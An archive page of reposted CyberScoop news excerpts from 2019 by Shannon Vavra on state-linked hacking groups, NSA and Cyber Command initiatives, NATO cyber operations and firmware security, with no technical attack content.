Shannon Vavra – Page 39 – WindowsTechs.com

Symantec finds a ‘new’ Chinese hacking group has actually been around for a decade

Posted on September 9, 2019 by Shannon Vavra

A Chinese cyber-espionage group that Symantec first exposed last June may actually be part of another group that has already been discovered, according to the company’s researchers. The group, which Symantec last labeled as “Thrip,” have attacked targets in 12 organizations in Hong Kong, Macau, Indonesia, Malaysia, the Philippines and Vietnam since it was first identified. Additionally, researchers say it has returned with a new custom-built tool. “When they came back in October [or] November, we see [Thrip] using a brand new tool which is built from scratch [that] we’ve never seen before,” Vikram Thakur, a technical director at Symantec told CyberScoop. “[The hackers] pause, retool, regroup and then they continue their mission.” However, Symantec’s analysis of a backdoor the group has been using, known as Sagerunex, reveals Thrip is likely another threat group — known Billbug or Lotus Blossom — that has been operating against targets in South Asia […]

The post Symantec finds a ‘new’ Chinese hacking group has actually been around for a decade appeared first on CyberScoop.

Continue reading Symantec finds a ‘new’ Chinese hacking group has actually been around for a decade→

Cyber Command’s biggest VirusTotal upload looks to expose North Korean-linked malware

Posted on September 8, 2019 by Shannon Vavra

Cyber Command’s largest-ever upload to VirusTotal exposes malware linked with North Korean government hackers, according to security researchers. #CNMF has posted multiple new malware samples: https://t.co/fSgk1xpG8t — USCYBERCOM Malware Alert (@CNMF_VirusAlert) September 8, 2019 Several of the malware samples have been tied to Lazarus Group, a group the U.S. government has linked with the North Korean government. Specifically, the samples look to be what’s known as “HOPLIGHT,” a trojan that has been used to gather information on victims’ operating systems and uses a public SSL certificate for secure communications with attackers. Cyber Command uploaded 11 malware samples in all. FireEye Managing Principal Threat Analyst Andrew Thompson said the upload signals to North Korea‘s government that it can’t remain anonymous in cyberspace. “Will this deter intelligence activities? Of course not. That’s foolish. What it does do is articulate [North Koreans] aren’t operating free from attribution, which limits the range of activities they should see as […]

The post Cyber Command’s biggest VirusTotal upload looks to expose North Korean-linked malware appeared first on CyberScoop.

Continue reading Cyber Command’s biggest VirusTotal upload looks to expose North Korean-linked malware→

As NSA expands election security task force, Director Paul Nakasone talks lessons learned

Posted on September 6, 2019 by Shannon Vavra

A key component of the Pentagon’s effort to defend the 2018 midterm elections from foreign interference was its collaboration with the Department of Justice to disrupt operations from overseas, Gen. Paul Nakasone, director of the National Security Agency, said Thursday. It’s the kind of interagency effort American officials are trying to achieve again before the 2020 presidential election. The NSA and U.S. Cyber Command, a unified combatant command at the Pentagon dedicated to running cyber-operations, worked with the FBI’s Foreign Influence Task Force in 2018 as part of an effort to avoid the kind of Russian meddling that occurred in 2016, Nakasone said. The effort to protect the 2018 midterm elections, collectively known as Synthetic Theology, resulted in disrupting the internet access of Russia’s social media troll farm, the Internet Research Agency. The effort represented the first cyber-operations abroad to protect U.S. elections, and it’s helping inform the intelligence community’s approach to […]

The post As NSA expands election security task force, Director Paul Nakasone talks lessons learned appeared first on CyberScoop.

Continue reading As NSA expands election security task force, Director Paul Nakasone talks lessons learned→

How did a Chinese APT get a U.S. hacking tool before it was leaked? Check Point has a theory.

Posted on September 5, 2019 by Shannon Vavra

A Chinese hacking group that has been using tools linked with the National Security Agency might have obtained at least one without breaching NSA systems, according to researchers at cybersecurity company Check Point. The Chinese hacking group APT3, which somehow had in its possession an NSA-linked tool in advance of public leaks in 2016 and 2017, appears to have acquired it by analyzing network traffic on a system that was potentially targeted by the NSA, Check Point says. The theory is that after observing the exploit in the wild, APT3 incorporated it into its own arsenal of attacks with some tweaks, the researchers say. “Check Point learned that the Chinese group was monitoring in-house machines that were compromised by the NSA, capturing the traffic of the attack and was leveraging it to reverse engineer the software vulnerabilities,” the researchers write. Check Point acknowledges that it “can’t prove this beyond any doubt.” The company says it does not know for sure […]

The post How did a Chinese APT get a U.S. hacking tool before it was leaked? Check Point has a theory. appeared first on CyberScoop.

Continue reading How did a Chinese APT get a U.S. hacking tool before it was leaked? Check Point has a theory.→

The NSA recognizes it needs to share more nation-state threat data, and faster

Posted on September 5, 2019 by Shannon Vavra

The National Security Agency’s new Cybersecurity Directorate wants to more quickly share threat data in response to private sector criticism that the agency has been slow to provide key information that companies need to protect themselves, the head of the new foreign intelligence and digital defense outfit said Wednesday. The NSA’s impetus for creating the Cybersecurity Directorate, set to launch Oct. 1, was to address complaints that context is lacking in U.S. intelligence community’s threat reports that are issued to private companies. By sharing data such as malicious domain names or IP addresses long after hackers have abandoned them, NSA is not providing the real-time information corporate security teams need to block attacks. Now, the directorate will provide additional context to help sectors like the defense industrial base and election technology providers “prevent and eradicate” intruders, according to Anne Neuberger, director of the NSA’s Cybersecurity Directorate. The goal for the directorate, which was […]

The post The NSA recognizes it needs to share more nation-state threat data, and faster appeared first on CyberScoop.

Continue reading The NSA recognizes it needs to share more nation-state threat data, and faster→

NATO cyber-operations center will be leaning on its members for offensive hacks

Posted on August 30, 2019 by Shannon Vavra

The North Atlantic Treaty Organization’s cyber-operations command center in Belgium still has a ways to go before its offensive playbook is set in stone, a NATO cyber official involved in the matter told CyberScoop. The Cyberspace Operations Centre was established almost exactly one year ago, in Mons, Belgium to help member nations’ obtain real-time intelligence on and respond to cyberthreats from criminal or nation-state backed hackers. The alliance is still working on pooling member nations’ offensive cyber capabilities for those responses, Deputy Director of the Cyberspace Operations Centre Group Captain Neal Dewar told CyberScoop in an interview. The cyber operations center was created in part to fulfill the alliance’s 2016 decision that under NATO’s Article V, a cyberattack on one member nation may result in a group of members coming to its defense, just as if a physical attack had occurred. But because the alliance does not have its own […]

The post NATO cyber-operations center will be leaning on its members for offensive hacks appeared first on CyberScoop.

Continue reading NATO cyber-operations center will be leaning on its members for offensive hacks→

‘China Chopper’ web shell makes a comeback in Lebanon, other Asian countries

Posted on August 27, 2019 by Shannon Vavra

Malicious code first discovered nine years ago that has historically been used by groups associated with Chinese state-backed hacks has made a comeback, according to new research from Cisco’s Security and Intelligence Research Group, Talos. The hacking tool is web shell known as China Chopper. A web shell is a script that allows attackers to remotely access servers running web applications. This particular web shell has long been known to be an exploit that’s often impervious to being outed and detected. “China Chopper is a slick little web shell that does not get enough exposure and credit for its stealth,” FireEye researchers wrote in 2013 in their blog on the matter. China Chopper’s code as historically been small, according to security researcher Keith Tyler, who wrote on the tool in 2012. That much appears to be the same now — Talos researchers note the most recent campaign has been “extremely simple,” containing just one […]

The post ‘China Chopper’ web shell makes a comeback in Lebanon, other Asian countries appeared first on CyberScoop.

Continue reading ‘China Chopper’ web shell makes a comeback in Lebanon, other Asian countries→

NSA-approved cybersecurity law and policy course now available online

Posted on August 27, 2019 by Shannon Vavra

Anyone who is interested in cybersecurity law and policy can now take an online course that was partly shaped by National Security Agency. The course, which can be accessed through Penn State University’s Clark Center, touches on international and domestic cybersecurity law, cyber risk and technical details like how smartphones function, according to Anne McKenna, a Penn State professor who organized the course. James Houck, director of Penn State’s Center for Security Research and Education, told CyberScoop that program will serve as a primer to the legal and technical details of offensive and defensive cyber-operations. “What we’re trying to do … is create a framework for people who are trying to be introduced to cyber law, to offensive, defensive cyber operations, and for them to learn the fundamentals, the framework — and in our case legal authorities for how these work,” Houck said. Houck clarified that although the NSA put out […]

The post NSA-approved cybersecurity law and policy course now available online appeared first on CyberScoop.

Continue reading NSA-approved cybersecurity law and policy course now available online→

How an NSA researcher plans to allow everyone to guard against firmware attacks

Posted on August 22, 2019 by Shannon Vavra

A years-long project from researchers at the National Security Agency that could better protect machines from firmware attacks will soon be available to the public, the lead NSA researcher on the project tells CyberScoop. The project will increase security in machines essentially by placing a machine’s firmware in a container to isolate it from would-be attackers. A layer of protection is being added to the System Management Interrupt (SMI) handler — code that allows a machine to make adjustments on the hardware level — as part of the open source firmware platform Coreboot. Eugene Myers, who works in the National Security Agency’s Trusted Systems Research Group, told CyberScoop that the end product — known as an SMI Transfer Monitor with protected execution (STM-PE) — will work with x86 processors that run Coreboot. Attackers are increasingly targeting firmware in order to run malicious attacks. Just last year, the first-ever documented UEFI rootkit was deployed in the wild, according […]

The post How an NSA researcher plans to allow everyone to guard against firmware attacks appeared first on CyberScoop.

Continue reading How an NSA researcher plans to allow everyone to guard against firmware attacks→

Army Cyber Command is trying to become an information warfare force

Posted on August 22, 2019 by Shannon Vavra

U.S. Army Cyber Command could soon have a new identity. Commander Lt. Gen. Stephen Fogarty said this week he wants his military outfit, dedicated to electronic warfare and information operations, to be renamed as the “Army Information Warfare Command.” The rechristening would better represent a new military mission, he said, and come at a time when Army cyber personnel increasingly deal with troll farms on social media, disrupt ISIS operations, and work to confuse international adversaries’ understanding of U.S. military units’ location. “The intent is to provide a proposal that will change us from Army Cyber Command to Army Information Warfare Command because we believe that is a more accurate descriptor of what I am being asked to do on a daily basis,” Fogarty said at the AFCEA TechNet conference in Augusta, Georgia this week. But this change, which Fogarty said he intends to push internally at the Department of Defense over the next two months, is more than just a new […]

The post Army Cyber Command is trying to become an information warfare force appeared first on CyberScoop.

Continue reading Army Cyber Command is trying to become an information warfare force→